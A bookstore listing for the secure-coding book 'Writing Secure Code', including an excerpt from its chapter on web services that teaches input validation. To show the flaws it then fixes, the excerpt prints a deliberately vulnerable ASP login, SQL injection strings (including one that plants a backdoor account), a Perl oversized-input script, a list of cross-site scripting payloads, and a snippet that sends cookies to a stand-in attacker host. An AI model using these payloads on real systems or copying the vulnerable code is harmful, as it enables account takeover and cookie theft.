Writing Secure Code

Overview

Keep black-hat hackers at bay with the tips and techniques in this entertaining, eye-opening book! Developers will learn how to padlock their applications throughout the entire development process—from designing secure applications to writing robust code that can withstand repeated attacks to testing applications for security flaws. Easily digested chapters reveal proven principles, strategies, and coding techniques. The authors—two battle-scarred veterans who have solved some of the industry’s toughest security problems—provide sample code in several languages. This edition includes updated information about threat modeling, designing a security process, international issues, file-system issues, adding privacy to applications, and performing security code reviews. It also includes enhanced coverage of buffer overruns, Microsoft .NET security, and Microsoft ActiveX development, plus practical checklists for developers, testers, and program managers.


Product Details

ISBN-13: 9780735637405
Publisher: Pearson Education
Publication date: 12/04/2002
Series: Developer Best Practices
Sold by: Barnes & Noble
Format: eBook
Pages: 800
File size: 5 MB
Age Range: 18 Years

About the Author

David LeBlanc, Ph.D., is a founding member of the Trustworthy Computing Initiative at Microsoft. He has been developing solutions for computing security issues since 1992 and has created award-winning tools for assessing network security and uncovering security vulnerabilities. David is a senior developer in the Microsoft Office Trustworthy Computing group.

Read an Excerpt

12: Securing Web-Based Services

It's now time to turn our attention to what is potentially the most hostile of all environments: the Web. In this chapter, we'll focus on making sure that applications that use the Web as a transport mechanism are safe from attack. Much of this book has focused on non-Web issues; however, a good deal of the content is relevant for securing Web-based applications. For example, cryptographic mistakes and the storage of secrets—covered in Chapter 6, "Cryptographic Foibles," and Chapter 7, "Storing Secrets," respectively—as well as other aspects of this book relate to Web-based applications. But the subject definitely deserves its own chapter.

While I was researching background material in preparation for this chapter, it became obvious that one of the most common mistakes made by vendors of Web-based servers and Web-based applications is trusting users to send well-formed, nonmalicious data. If Web-based application designers can learn not to trust user input and to be stricter about what is considered valid input, fewer Web applications will be compromised. Because of these common security issues, a large portion of this chapter focuses on Web-specific canonicalization issues and safe ways to manipulate user input. I'll also discuss other common mistakes made by Internet Server Application Programming Interface (ISAPI) application and filter developers, and then I'll wrap up with cookie issues and storing secrets in Web pages.

Never Trust User Input!

I know this injunction sounds harsh, as if people are out to get you. But many are. If you accept input from users, either directly or indirectly, it is imperative that you validate the input before using it, because people will try to make your application fail by tweaking the input to represent invalid data. The first golden rule of user input is, All input is bad until proven otherwise. Typically, the moment you forget this rule is the moment you are attacked. In this section, we'll focus on the many ways developers read input, how developers use the input, and how attackers try to trip up your application by manipulating the input.

Let me introduce you to the second golden rule of user input: Data must be validated as it crosses the boundary between untrusted and trusted environments. By definition, trusted data is data that you, or an entity you explicitly trust, has complete control over; untrusted data refers to everything else. In short, any data submitted by a user is initially untrusted. The reason I bring this up is that many developers balk at checking input because they are positive the data is checked by some other function before it reaches their code, and they don't want to take the performance hit of validating it again. But what happens if the input comes from a source that is never checked, or the code you depend on changes because it, in turn, assumes some other code performs the validity check?
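
One way to make this boundary concrete is to funnel every piece of untrusted input through a single validation routine before any trusted code touches it. The following is only a minimal sketch; the helper name and field pattern are hypothetical, not taken from the chapter's samples:

// Minimal sketch: validate each untrusted field at the trust boundary.
// getCheckedField and the pattern below are hypothetical examples.
function getCheckedField(strField, reValid) {
    var strValue = String(Request.Form(strField));
    if (!reValid.test(strValue)) {
        // Reject anything that does not match the expected pattern.
        Response.Write("Access Denied");
        Response.End();
    }
    return strValue;
}

// Code past this point sees only validated data.
var strName = getCheckedField("name", /^[A-Za-z0-9]{1,32}$/);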

I once reviewed a security product that had a security flaw because a small chance existed that invalid user input would cause a buffer overrun and stop the product's Web service. The development team claimed that it could not check all the input because of potential performance problems. On closer examination, I found that not only was the application a critical network component—and hence the potential damage from an exploit was immense—but also it performed many time-intensive and CPU-intensive operations, including public-key encryption, heavy disk I/O, and authentication. I doubted very much that a half-dozen lines of input-checking code would lead to a performance problem. As it turned out, the added checks caused no performance problems, and the flaw was fixed.

Hopefully, by now, you understand that all input is suspicious until proven otherwise, and your application should validate direct user input before it uses it. Let's look at some strategies for handling hostile input.

User Input Vulnerabilities

Virtually all Web applications perform some action based on user requests. Let's be honest: a Web-based service that doesn't take user input is probably worthless! Remember that you should determine what is valid data and reject all other input. Let's look at an example, which is based on some Active Server Pages (ASP) code from a Web site that recommended Web site designers use the following JScript code in their ASP-based applications to implement forms-based authentication:

// Get the username and password from the form.
if (isValidUserAndPwd(Request.form("name"),
                      Request.form("pwd"))) {
    Response.write("Authenticated!");   
} else {
    Response.write("Access Denied"); 
}

function isValidUserAndPwd(strName, strPwd) {
    var fValid = false; 
    var oConn = new ActiveXObject("ADODB.Connection"); 
    oConn.Open("Data Source=c:\\auth\\auth.mdb;");
   
    var strSQL = "SELECT count(*) FROM client WHERE " +
        "name='" + strName + "' " +
        " and pwd='" + strPwd + "'";
    var oRS = new ActiveXObject("ADODB.RecordSet");
    oRS.Open(strSQL, oConn);
    fValid = (oRS(0).Value > 0) ? true : false;

    oRS.Close(); 
    delete oRS;
    oConn.Close();
    delete oConn; 

    return fValid;
}

Below is the client code used to send the username and password to the JScript code by using an HTTP POST:

<FORM ACTION="Logon.asp" METHOD=POST>
    <INPUT TYPE=text MAXLENGTH=32 NAME=name>
    <INPUT TYPE=password MAXLENGTH=32 NAME=pwd>
    <INPUT TYPE=submit NAME=submit VALUE="Logon">
</FORM>

An explanation of this code is in order. The user enters a username and a password by using the HTML form shown above and then clicks the Logon button. The ASP code takes the username and password from the form and builds a SQL statement based on the user's data to query a database. If the number of rows returned by the query is greater than zero—SELECT count(*) returns the number of rows matched by the SQL query—the username and password combination is valid and the user is allowed to log on to the system.

Both the client and server code are hopelessly flawed, however, because the solution takes direct user input and uses it to access a database without checking whether the input is valid. In other words, data is transferred from an untrusted source—a user—to a trusted environment, the SQL database under the application's control.

Let's assume a nonmalicious user enters his name, Blake, and password $qu1r+, which builds the following SQL statement:

SELECT count(*) FROM client
WHERE name='Blake'
AND pwd='$qu1r+'

If this is a valid username and password combination, count(*) returns a value of at least 1 and allows the user access to the system. The query could potentially return more than 1 if two users exist with the same username and password or if an administrative error leads to the data being entered twice.

Now let's turn our attention to what a bad guy might do to compromise the system. Because the username and password are unchecked by the ASP application, the attacker can send any input. We'll look at this as a series of mistakes and then determine how to remedy the errors.

Mistake #1: Trusting the User

You should never trust user input directly, especially if the user input is anonymous. Remember the two golden rules: never trust user input, and always check data as it moves from an untrusted to a trusted domain.

One malicious input scenario to be especially wary of is your application taking user input and using it to create output for other users. For example, consider the security ramifications if you build a Web service that allows users to create and post product reviews for other users of the system to read prior to making a product purchase. Imagine that an attacker does not like ProductA but likes ProductB. The attacker creates a comment about ProductA, which will appear on the ProductA Web page along with all the other reviews. However, the comment is this:

<meta http-equiv="refresh"
    content="2;URL=http://www.northwindtraders.com/productb.aspx">

This HTML code will send the user's browser to the product page for ProductB after the browser has spent two seconds at the page for ProductA!

Cross-site scripting   Another variation of this attack is the cross-site scripting attack. Once again, trusting user input is at fault, but in this case the attacker sends a user a link in e-mail, or otherwise points the user to a Web site, with a malicious payload embedded in the URL's query string. The attack is particularly bad if the Web site creates an error message with the embedded query string as part of the error text.

Let's look at a fictitious example. A Web service allows you to view remote documents by including the document name in the query string. For example,

http://servername/view.asp?file=filename

An attacker sends the following URL in e-mail—probably by using SMTP spoofing to disguise the attacker's identity—to an unsuspecting victim:

http://servername/view.asp?file=<script>x=document.cookie;alert("Cookie%20"%20%2b%20x);</script>

Note the use of %nn characters; these are hexadecimal escape sequences for ASCII characters and are explained later in this chapter. For the moment, all you need to know is %20 is a space, and %2b is a plus (+) symbol. The reason for using the escapes is to remove any spaces and certain special characters from the query string so that it's correctly parsed by the server.

When the victim clicks the URL, the Web server attempts to access the file in the query string, which is not a file at all but JScript code. The server can't find the file, so it sends an error to the user to that effect. However, it also includes the name of the "file" that could not be found in the error message. The script that makes up the filename is then executed by the user's browser. You can do some serious damage with small amounts of JScript!
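
The vulnerable pattern is easy to fall into. The following sketch of a hypothetical view.asp error path (my illustration, not code from an actual product) shows how echoing the unvalidated query string into the error page hands the attacker's script to the victim's browser:

// Hypothetical, deliberately vulnerable sketch of view.asp.
// fileExists is a placeholder helper; the flaw is the Response.Write call.
var strFile = String(Request.QueryString("file"));
if (!fileExists(strFile)) {
    // BAD: the unvalidated "filename", which may be <script>...</script>,
    // is written into the error page and runs in the victim's browser.
    Response.Write("Sorry, the file " + strFile + " could not be found.");
}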

With cross-site scripting, cookies can be read; browser plug-ins or native code can be instantiated and scripted with untrusted data; and user input can be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. Furthermore, data gathered by the malicious script can be sent back to the attacker's Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, it can send the data to the attacker by fetching a URL of the form http://www.northwindtraders.com/CollectData.html?data=SSN123-45-6789.
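
To make the exfiltration step concrete, the injected script needs nothing more elaborate than the following sketch; requesting an image from the attacker's server is enough to leak the data carried in the URL:

// Sketch of attacker-supplied script running in the victim's browser.
// Fetching an image from the attacker's server leaks the cookie in the URL.
var oImg = new Image();
oImg.src = "http://www.northwindtraders.com/CollectData.html?data=" +
           escape(document.cookie);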

This attack can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that doesn't check fields in forms for special characters. This isn't trivial to determine unless the attacker has inside knowledge, but it is possible.

Cross-site scripting bugs were found in many products during 2000, which led the CERT® Coordination Center at Carnegie Mellon University to issue a security advisory entitled "Malicious HTML Tags Embedded in Client Web Requests," warning developers of the risks of cross-site scripting. You can find out more at www.cert.org/advisories/CA-2000-02.html. A wonderful explanation of the issues is also available in "Cross-Site Scripting Overview" at www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp.

Mistake #2: Unbounded Sizes

If the size of the client data is unbounded and unchecked, an attacker can send as much data as she wants. This could be a security issue if there exists an as-yet-unknown buffer overrun in the database code called when invoking the SQL query. On closer examination, an attacker can easily bypass the maximum username and password size restrictions imposed by the previous client HTML form code, which restricts both fields to 32 characters, simply by not using the client code. Instead, attackers write their own client code in, say, Perl, or just use a Telnet client. The following is such an example, which sends a valid HTML form to Logon.asp but sets the password and username to be 32,000 letter As.

use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$ua = LWP::UserAgent->new();
$req = POST 'http://www.northwindtraders.com/Logon.asp',
         [ pwd  => 'A' x 32000,
           name => 'A' x 32000,
         ];
$res = $ua->request($req);

Do not rely on client-side HTML security checks—in this case, by thinking that the username and password lengths are restricted to 32 characters—because an attacker can always bypass such controls by bypassing the client altogether.
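
The server-side counterpart is straightforward. A minimal sketch, reusing the 32-character limit the form claims to enforce, rejects oversized fields before any other code sees them:

// Enforce the length limits on the server; never rely on MAXLENGTH alone.
var strName = String(Request.Form("name"));
var strPwd  = String(Request.Form("pwd"));
if (strName.length < 1 || strName.length > 32 ||
    strPwd.length  < 1 || strPwd.length  > 32) {
    Response.Write("Access Denied");
    Response.End();
}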

Mistake #3: Using Direct User Input in SQL Statements

This scenario is a little more insidious. Because the input is untrusted and has not been checked for validity, an attacker could change the semantics of the SQL statement. In the following example, the attacker enters a completely invalid name and password, both of which are b' or '1' = '1, which builds the following valid SQL statement:

SELECT count(*)
FROM client
WHERE name='b' or '1'='1' and pwd='b' or '1'='1'

Look closely and you'll see that this statement will always return a row count greater than zero—as long as the client table contains any rows at all—because the trailing or '1'='1' clause is true for every row. The attacker is authenticated without knowing a valid username or password; he simply entered input that changed the way the SQL query works.

Here's another variation: if the attacker knows a username and wants to spoof that user's account, he can do so using SQL comments—for example, two hyphens (--) in Microsoft SQL Server or the hash sign (#) in MySQL. (Comment syntax varies from database to database.) Rather than entering b' or '1' = '1, the attacker enters Cheryl' --, which builds up the following legal SQL statement:

SELECT count(*)
FROM client
WHERE name='Cheryl' --and pwd=''

If a user named Cheryl is defined in the system, the attacker can log in, because the rest of the SQL statement—the part that evaluates the password—has been commented out, so the password is never checked!

The types of attacks open to an assailant don't stop there—allow me to show you one more scenario, and then I'll focus on solutions for the issues we've examined.

SQL statements can be joined. For example, the following SQL is valid:

SELECT * from client INSERT into client VALUES ('me', 'URHacked')

This single line is actually two SQL statements. The first selects all rows from the client table, and the second inserts a new row into the same table.

An attacker could use this login ASP page and enter a username of b' INSERT INTO client VALUES ('me', 'URHacked') --, which would build the following SQL:

SELECT count(*)
FROM client
WHERE name='b' INSERT INTO client VALUES ('me', 'URHacked') --and pwd=''

Once again, the password is not checked, because that part of the query is commented out. Worse, the attacker has added a new row containing me as a username and URHacked as the password—now the attacker can log in using me and URHacked!

Enough bad news—let's look at remedies!

User Input Remedies

As with all user input issues, the first rule is to determine which input is valid and to reject all other input. (Have I said that enough times?) Other not-so-paranoid options exist and offer more functionality with potentially less security. I'll discuss some of these also.

A Simple and Safe Approach: Be Hardcore About Valid Input

In the cases of the Web-based form and SQL examples earlier, the valid characters for a username can be easily restricted to a small set of valid characters, such as A-Za-z0-9. The following server-side JScript snippet shows how to construct and use a regular expression to parse the username at the server:

// Determine whether username is valid.
// Valid format is 1 to 32 alphanumeric characters. 
var reg = /^[A-Za-z0-9]{1,32}$/g;
if (reg.test(Request.form("name")) > 0) {
    // Cool! Username is valid.
} else {
    // Not cool! Username is invalid.
}

Not only does this regular expression restrict the username to a small subset of characters, but it also makes sure the string is between 1 and 32 characters long. If you make decisions about user input in COM components written in Microsoft Visual Basic or C++, you should read Chapter 8, "Canonical Representation Issues," to learn how to use regular expressions in other languages.

Your code should apply a regular expression to all input, whether it is part of a form, an HTTP header, or a query string.
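
The same pattern applies to headers. The sketch below validates the User-Agent header pulled from Request.ServerVariables before it is logged or echoed anywhere; the particular header and pattern are simply illustrative choices:

// Validate a request header just like any other untrusted input.
// The header and the pattern here are illustrative, not prescriptive.
var strAgent = String(Request.ServerVariables("HTTP_USER_AGENT"));
var regAgent = /^[A-Za-z0-9 \.\/\(\);:,_\+\-]{1,256}$/;
if (regAgent.test(strAgent)) {
    // Cool! Header looks reasonable.
} else {
    // Not cool! Treat the request as hostile.
}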

In the case of the filename passed to the Web server as a query string, the following regular expression, which represents a valid filename—note that this does not allow for directories or drive letters!—would stamp out any attempt to use script as part of the query string:

// Determine whether filename is valid.
// Valid format is 1 to 24 alphanumeric characters 
// followed by a period, and 1 to 3 alpha characters.
var reg = /^[A-Za-z0-9]{1,24}\.[A-Za-z]{1,3}$/g;
if (reg.test(Request.QueryString("file")) > 0) {
    // Cool! Valid filename.
} else {
    // Not cool! Invalid filename.
}

Not being strict is dangerous   A common mistake made by many Web developers is to allow "safe" HTML constructs—for example, allowing a user to send <IMG> or <TABLE> tags to the Web application. The idea is that the user can then send these HTML tags and plaintext but nothing else. Do not do this. A cross-site scripting danger still exists because the attacker can embed script in some of these tags. Here are some examples:

  • <img src=javascript:alert(document.domain)>
  • <link rel=stylesheet href="javascript:alert(document.domain)">
  • <input type=image src=javascript:alert(document.domain)>
  • <bgsound src=javascript:alert(document.domain)>
  • <iframe src="javascript:alert(document.domain)">
  • <frameset onload=vbscript:msgbox(document.cookie)></frameset>
  • <table background="javascript:alert(document.domain)"></table>
  • <object type=text/html data="javascript:alert(document.domain);"></object>
  • <body onload="javascript:alert(document.cookie)"></body>
  • <body background="javascript:alert(document.cookie)"></body>
  • <p style=left:expression(alert(document.cookie))>

Let's say you want to allow a small subset of HTML tags so that your users can add some formatting to their comments. Allowing tags like <I>…</I> and <B>…</B> is safe, so long as the regular expression looks for these character sequences explicitly. The following regular expression will allow these tags, as well as other safe characters:

var reg = /^(?:[\s\w\?\.\,\!\$]+|(?:\<\/?[ib]\>))+$/gi;
if (reg.test(strText) > 0) {
    // Cool! Valid input.
} else {
    // Not cool! Invalid input.
}

This regular expression will allow spaces (\s); A-Za-z0-9 and '_' (\w); a limited subset of punctuation; and a < followed by an optional /, the letter i or b, and a >. The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate that the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML even though the tags are not malicious.

So you think you're safe?   Another mistake I've seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Visual Basic Scripting Edition (VBScript), which is case-insensitive, instead? Don't think that stripping single or double quotes will help either—many script and HTML constructs take arguments without quotes.

In summary, you should be strict about what is valid user input, and make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users.
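
If validated input does have to be redisplayed to other users, HTML-encoding it at output time is a common complementary safeguard. A minimal sketch using the ASP Server.HTMLEncode method follows; the comment field is a hypothetical example:

// Encode user-supplied text before writing it into a page for other users,
// so characters such as < and > are rendered as text, not markup.
var strComment = String(Request.Form("comment"));   // hypothetical field
Response.Write(Server.HTMLEncode(strComment));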

Special Care of Passwords

You could potentially use regular expressions to restrict passwords to a limited subset of valid characters. But doing so is problematic because you need to allow complex passwords, which means allowing many nonalphanumeric characters. A naive approach is to use the same regular expression defined earlier but restrict the valid character list to A-Za-z0-9 and a series of punctuation characters you know are safe. This requires that you understand all the special characters used by your database, or by the shell if you're passing the data to another process. Even worse, you might disallow certain characters, such as the | character, but allow the % character and numerals, in which case the attacker can smuggle the | character past the check as a hexadecimal escape, %7c, which is a valid series of characters in the regular expression.

One way of handling passwords is not to use the password directly; instead, you could base64-encode or hash the password prior to passing it to the query. The former is reversible, which means that if the Web application requires the plaintext password for some other task, it can un-base64 the password held in the database. However, if you do not need the password for anything other than authenticating the incoming client, you can simply hash the password and compare the result with the hash stored in the database. A positive side effect of this approach is that if the authentication database is compromised, the attacker has access only to the password hashes, not to the passwords themselves. Refer to Chapter 7 for more information about this process.
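
As a sketch of the hashing option, assuming the CAPICOM component is available on the server (it is one of several ways to hash data from script, not a requirement), the password can be reduced to a hex digest before it ever appears in a query:

// Hash the supplied password before using it in the query (sketch only).
// Assumes the CAPICOM COM component is installed on the server.
var CAPICOM_HASH_ALGORITHM_SHA1 = 0;
var oHash = new ActiveXObject("CAPICOM.HashedData");
oHash.Algorithm = CAPICOM_HASH_ALGORITHM_SHA1;
oHash.Hash(String(Request.Form("pwd")));
var strPwdHash = oHash.Value;   // hex digest; compare with the stored hash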

The preferred approach is to use the Web server's capabilities to encode the password. In the case of ASP, you can use the Server.URLEncode method to encode the password, and you can use HttpServerUtility.UrlEncode in ASP.NET. URLEncode applies various rules to convert nonalphanumeric characters to hexadecimal equivalents. For example, the password '2Z.81h\/^-$% (which begins with a single quote) becomes %272Z%2E81h%5C%2F%5E%2D%24%25. The password has the same effective strength in both cases—you incur no password entropy loss when performing the encoding operation.
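
Applied to the logon example earlier, that amounts to encoding the password before concatenating it into the SQL string. The sketch below assumes strName has already passed the username regular expression shown earlier, and that the value stored in the client table was encoded the same way when the account was created:

// Encode the password before it is placed in the SQL string (sketch only).
// strName is assumed to have passed the username check shown earlier.
var strEncPwd = Server.URLEncode(String(Request.Form("pwd")));
var strSQL = "SELECT count(*) FROM client WHERE " +
    "name='" + strName + "' and pwd='" + strEncPwd + "'";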

What's really cool about URLEncode is that it caters to UTF-8 characters also, so long as the Web page can process UTF-8 characters. For example, the following nonsense French phrase—"Général à la François"—becomes G%C3%A9n%C3%A9ral+%C3%A0+la+Fran%C3%A7ois. You can force an ASP page to use UTF-8 data by setting Session.Codepage=65001 at the start of the ASP page or by using the HttpSessionState.CodePage property in ASP.NET.

Do not give up if your application does not have access to the CodePage property or the URLEncode method. You have five options. The first is to use the UrlEscape function exported by Shlwapi.dll. The second is to use CoInternetParseUrl exported by Urlmon.dll. The third is to use InternetCanonicalizeUrl exported by Wininet.dll. You can also use the ATL Server CUrl::Canonicalize method defined in Atlutil.h. If your application uses JScript, you can use the escape and unescape functions to encode and decode the string.

Note that UrlEscape and CoInternetParseUrl should be called from client applications only, and it's recommended that you check each function or method before using it to verify it has the appropriate options and capabilities for your application....

Table of Contents

Foreword
Acknowledgments
Introduction

Part I: Contemporary Security
1: The Need for Secure Systems
2: Designing Secure Systems

Part II: Secure Coding Techniques
3: Public Enemy #1: The Buffer Overrun
4: Determining Good Access Control
5: Running with Least Privilege
6: Cryptographic Foibles
7: Storing Secrets
8: Canonical Representation Issues

Part III: Network-Based Application Considerations
9: Socket Security
10: Securing RPC, ActiveX Controls, and DCOM
11: Protecting Against Denial of Service Attacks
12: Securing Web-Based Services

Part IV: Special Topics
13: Writing Secure .NET Code
14: Testing Secure Applications
15: Secure Software Installation
16: General Good Practices

Part V: Appendixes
A: Dangerous APIs
B: The Ten Immutable Laws of Security
C: The Ten Immutable Laws of Security Administration
D: Lame Excuses We've Heard

A Final Thought
Annotated Bibliography
Index